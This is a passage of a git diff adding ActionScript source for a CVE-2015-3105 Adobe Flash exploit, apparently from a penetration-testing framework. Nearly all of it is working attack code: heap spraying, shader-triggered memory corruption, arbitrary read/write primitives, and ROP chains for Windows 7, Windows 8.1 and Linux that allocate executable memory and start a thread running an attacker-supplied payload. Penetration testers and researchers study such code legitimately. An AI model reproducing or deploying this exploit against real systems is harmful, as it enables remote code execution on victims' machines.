+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/Exploit.as b/external/source/exploits/CVE-2015-3105/Exploit.as
new file mode 100755
index 0000000000..3cd687f6b4
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/Exploit.as
@@ -0,0 +1,237 @@
+package
+{
+    import flash.display.Shader
+    import flash.display.Sprite
+    import flash.display.LoaderInfo
+    import mx.utils.Base64Decoder
+    import flash.utils.ByteArray
+    import flash.geom.Point
+    import flash.utils.Endian
+
+    public class Exploit extends Sprite
+	{
+		private var uv:Vector.<uint>
+        private var canvas:Sprite
+        private var filler_shader:Shader
+        private var transformation_shader:Shader
+        private var top_middle:Point
+        private var bottom_left:Point
+        private var bottom_right:Point
+        
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+        private var exploiter:Exploiter
+                        
+        [Embed ( source="test_bin.pbj", mimeType="application/octet-stream" ) ]
+        private static var FillerPbj:Class
+        [Embed ( source="pbsrc_bin.pbj", mimeType="application/octet-stream" ) ]
+        private static var TransformationPbj:Class
+
+        private var uint_vectors_length:uint = 70000
+        private var ba_vector_length:uint = 5000
+        private var ba_length:int = 0x2000
+        private var uint_vectors:Vector.<Object>
+        private var ba_vector:Vector.<Object>
+        
+        public function Exploit()
+        {
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+            
+			canvas = new Sprite()
+            addChild(canvas)
+            var size:uint = 400
+
+            top_middle = new Point(size / 2, 10)
+            bottom_left = new Point(0, size - 10)
+            bottom_right = new Point(size, size - 10)
+            do_exploit()
+        }
+                
+        private function do_exploit():void
+        {
+			setup_shaders()
+			apply_shader_to_exploit()
+		}
+		
+		private function setup_shaders():void
+        {
+			transformation_shader = new Shader(new TransformationPbj())
+			
+			ba_vector = new Vector.<Object>(ba_vector_length)
+			uint_vectors = new Vector.<Object>(uint_vectors_length)
+			
+            // Initialize uint vectors
+			for(var i:uint = 0; i < uint_vectors_length; i++) // 70000
+			{
+				uint_vectors[i] = new Vector.<uint>()
+			}
+		    
+            // Allocate Byte Arrays
+			for(i = 0; i < ba_vector_length; i++) // 5000
+			{
+				ba_vector[i] = new ByteArray()
+				ba_vector[i].endian = "littleEndian"
+				ba_vector[i].length = ba_length // 0x2000
+				fill_byte_array(ba_vector[i], 0x35555555)
+				ba_vector[i].writeInt(0xbabefac0)
+				ba_vector[i].writeInt(0xbabefac1)
+				ba_vector[i].writeInt(i)
+				ba_vector[i].writeInt(0xbabefac3)
+			}
+			
+			// Make holes
+			for(i = 5000 / 3; i < ba_vector_length; i = i + 3) // 5000
+			{
+				fill_byte_array(ba_vector[i], 0x37777777)
+				ba_vector[i].clear()
+				ba_vector[i] = null
+			}
+			
+            // Setup shader
+			filler_shader = new Shader(new FillerPbj()) //test_bin.pbj 
+			filler_shader.data.point1.value = [top_middle.x, top_middle.y]
+            filler_shader.data.point2.value = [bottom_left.x, bottom_left.y]
+			filler_shader.data.point3.value = [bottom_right.x, bottom_right.y]
+		}
+		
+		final private function fill_byte_array(ba:ByteArray, value:int):void 
+		{
+            ba.position = 0
+            var i:uint = 0
+			while (i < ba.length / 4)
+			{
+				ba.writeInt(value)
+				i = i + 1
+			}
+            ba.position = 0
+            return
+        }
+		
+		private function apply_shader_to_exploit():void
+		{	
+			try {
+				filler_shader.data.point3 = transformation_shader.data.positionTransformation27
+			} catch(err:Error) {
+				Logger.log("Error!")
+			}
+			
+            filler_shader.data.color1.value = [1, 1, 1, 1]
+            
+            // Trigger corruption with the hope of modify one of the sprayed byte arrays
+            canvas.graphics.clear()
+            canvas.graphics.beginShaderFill(filler_shader)
+            canvas.graphics.moveTo(top_middle.x, top_middle.y)
+            canvas.graphics.lineTo(bottom_left.x, bottom_left.y)
+            canvas.graphics.lineTo(bottom_right.x, bottom_right.y)
+            canvas.graphics.endFill()
+            
+            // Search the BA whose data has been corrupted
+            var test:uint
+            var mod_idx:uint = 0xffffffff
+            for(var i:uint = 0; i< ba_vector_length; i++) { // 5000
+				if (ba_vector[i] != null) {
+					ba_vector[i].position = 32
+					test = ba_vector[i].readUnsignedInt()
+					if (test != 0x35555555) {
+                        mod_idx = i
+						break
+					}
+				}
+			}
+            
+            if (mod_idx == 0xffffffff) {
+                Logger.log("[*] Exploit - apply_shader_to_exploit(): Modified ba not found... aborting")
+                return
+            }
+			
+			// Clear the modified BA, we need a hole there =)
+			fill_byte_array(ba_vector[mod_idx], 0x39999999)
+			ba_vector[mod_idx].clear()
+			ba_vector[mod_idx] = null
+			
+			// Fill the BA space with well positioned Vector.<uint>'s, hopefully...
+			for(i = 0; i < uint_vectors_length; i++) // 70000
+			{
+				uint_vectors[i].length = 0x13e
+				uint_vectors[i][0] = 0xcccccccc
+				uint_vectors[i][1] = i
+				uint_vectors[i][2] = 0xaaaaaaaa
+			}
+			
+            // Corrupt again, hopefully one of our vector lengths =)
+            canvas.graphics.beginShaderFill(filler_shader)
+
+            var corrupted:uint = 0xffffffff
+			for(i = 0; i < uint_vectors_length; i++) // 70000
+			{
+				if (uint_vectors[i].length != 0x13e) {
+                    corrupted = i
+					break 
+				}
+			}
+			
+            if (corrupted == 0xffffffff) {
+                Logger.log("[*] Exploit - apply_shader_to_exploit(): Corrupted vector not found... aborting")
+                return
+            }
+			
+            var offset:uint = 0xffffffff
+			for(i = 0; i < 2048; i++)
+			{
+				if (uint_vectors[corrupted][i] == 0x13e && uint_vectors[corrupted][i+2] == 0xcccccccc) 
+				{
+					uint_vectors[corrupted][i] = 0xffffffff
+                    offset = i
+					break
+				}
+			}
+            
+            if (offset == 0xffffffff) {
+                Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector for manual corruption not found... aborting")
+                return
+            }
+			
+			for(i = 0; i < uint_vectors_length; i++) // 70000
+			{
+				if (uint_vectors[i].length == 0xffffffff) {
+					uv = uint_vectors[i]
+					break 
+				}
+			}
+            
+            if (uv == null) {
+                Logger.log("[*] Exploit - apply_shader_to_exploit(): Vector manually corrupted not found... aborting")
+                return
+            }
+			
+			var my_offset:uint = 0x3ffffffe - offset - 2
+			uv[my_offset] = 0x13e
+            
+            for(i = 0; i < ba_vector_length; i++) { // 5000
+				if (ba_vector[i] != null) {
+        			ba_vector[i].clear()
+        			ba_vector[i] = null
+				}
+			}
+            
+			for(i = 0; i < uint_vectors_length; i++) // 70000
+			{
+				if (uint_vectors[i].length != 0xffffffff) {
+                    delete(uint_vectors[i])
+        			uint_vectors[i] = null
+				}
+			}
+            
+            exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
+		}
+
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/ExploitByteArray.as b/external/source/exploits/CVE-2015-3105/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/ExploitVector.as b/external/source/exploits/CVE-2015-3105/ExploitVector.as
new file mode 100644
index 0000000000..18aa4778a0
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/ExploitVector.as
@@ -0,0 +1,75 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint 
+        
+        public function ExploitVector(v:Vector.<uint>, length:uint)
+        {
+            uv = v
+            original_length = length
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/Exploiter.as b/external/source/exploits/CVE-2015-3105/Exploiter.as
new file mode 100644
index 0000000000..ecbf56fac5
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv, uv_length)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            // 2) Recover original stack
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi
+
+            // my_memcpy
+            eba.write(buffer + 0x60, "\x56", false) // push esi
+            eba.write(0, "\x57", false)             // push edi
+            eba.write(0, "\x51", false)             // push ecx
+            eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10]
+            eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14]
+            eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18]
+            eba.write(0, "\xF3\xA4", false)         // rep movsb 
+            eba.write(0, "\x59", false)             // pop ecx
+            eba.write(0, "\x5f", false)             // pop edi
+            eba.write(0, "\x5e", false)             // pop esi
+            eba.write(0, "\xc3", false)             // ret
+
+            // Put the popen parameters in memory
+            eba.write(payload_address + 0x8, payload, true) // false
+           
+            // Put the fake stack/vtable on memory 
+            eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
+            eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024
+
+            // Return to mprotect()
+            eba.write(stack_address + 0x18034, mprotect)
+            // Return to stackpivot (jmp over mprotect parameters)
+            eba.write(0, addesp2cret)
+            // mprotect() arguments
+            eba.write(0, buffer) // addr
+            eba.write(0, 0x1000) // size
+            eba.write(0, 0x7)    // PROT_READ | PROT_WRITE | PROT_EXEC
+
+            // Return to mmap()
+            eba.write(stack_address + 0x18068, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() code segment arguments
+            eba.write(0, 0x70000000) // 0x70000000
+            eba.write(0, 0x4000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, 0xffffffff) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to mmap()
+            eba.write(stack_address + 0x1809c, mmap)
+            // Return to stackpivot (jmp over mmap parameters)
+            eba.write(0, addesp2cret)
+            // mmap() stack segment arguments
+            eba.write(0, 0x70008000) // NULL
+            eba.write(0, 0x10000) // size
+            eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC
+            eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS
+            eba.write(0, -1) // filedes
+            eba.write(0, 0) // offset
+
+            // Return to memcpy()
+            eba.write(stack_address + 0x180d0, buffer + 0x60)
+            // Return to stackpivot (jmp over memcpy parameters)
+            eba.write(0, addesp2cret)
+            // memcpy() parameters
+            eba.write(0, 0x70000000)
+            eba.write(0, payload_address + 0x8)
+            eba.write(0, payload.length)
+
+            // Return to clone()
+            eba.write(stack_address + 0x18104, clone)
+            // Return to CoE (fix stack and object vtable)
+            eba.write(0, buffer + 0x10)
+            // clone() arguments
+            eba.write(0, 0x70000000) // code
+            eba.write(0, 0x7000bff0) // stack
+            eba.write(0, 0x00000100) // flags CLONE_VM
+            eba.write(0, 0)          // args
+           
+            //call   DWORD PTR [eax+0x24]
+            //EAX: 0x41414141 ('AAAA')
+            //EDI: 0xad857088 ("AAAA\377")
+            eba.write(main, stack_address + 0x18000)
+            exploit.hasOwnProperty('msf')
+        }
+
+        private function cleanup():void
+        { 
+            Logger.log("[*] Exploiter - cleanup()")
+            spray = null
+            stack = null
+            payload_space = null
+            eba = null
+            ev = null
+            exploit = null
+            System.pauseForGCIfCollectionImminent(0)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/Logger.as b/external/source/exploits/CVE-2015-3105/Logger.as
new file mode 100644
index 0000000000..16c0447973
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/Logger.as
@@ -0,0 +1,32 @@
+package 
+{
+    import flash.external.ExternalInterface
+
+    public class Logger {
+        private static const DEBUG:uint = 0
+ 
+        public static function alert(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("alert", str);
+            }
+        }
+
+        public static function log(msg:String):void
+        {
+            var str:String = "";
+
+            if (DEBUG == 1)
+                str += msg;
+            
+            if(ExternalInterface.available){
+                ExternalInterface.call("console.log", str);
+            }
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/PE.as b/external/source/exploits/CVE-2015-3105/PE.as
new file mode 100644
index 0000000000..8753586477
--- /dev/null
+++ b/external/source/exploits/CVE-2015-3105/PE.as
@@ -0,0 +1,72 @@
+package
+{
+    public class PE
+    {
+        private var eba:ExploitByteArray
+
+        public function PE(ba:ExploitByteArray)
+        {
+            eba = ba
+        }
+
+        public function base(addr:uint):uint
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (eba.read(addr) == 0x00905a4d) return addr
+                addr -= 0x10000
+            }
+            return 0
+        }
+
+        public function module(name:String, addr:uint):uint
+        {
+            var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
+            var mod_name:String
+
+            while (true) {
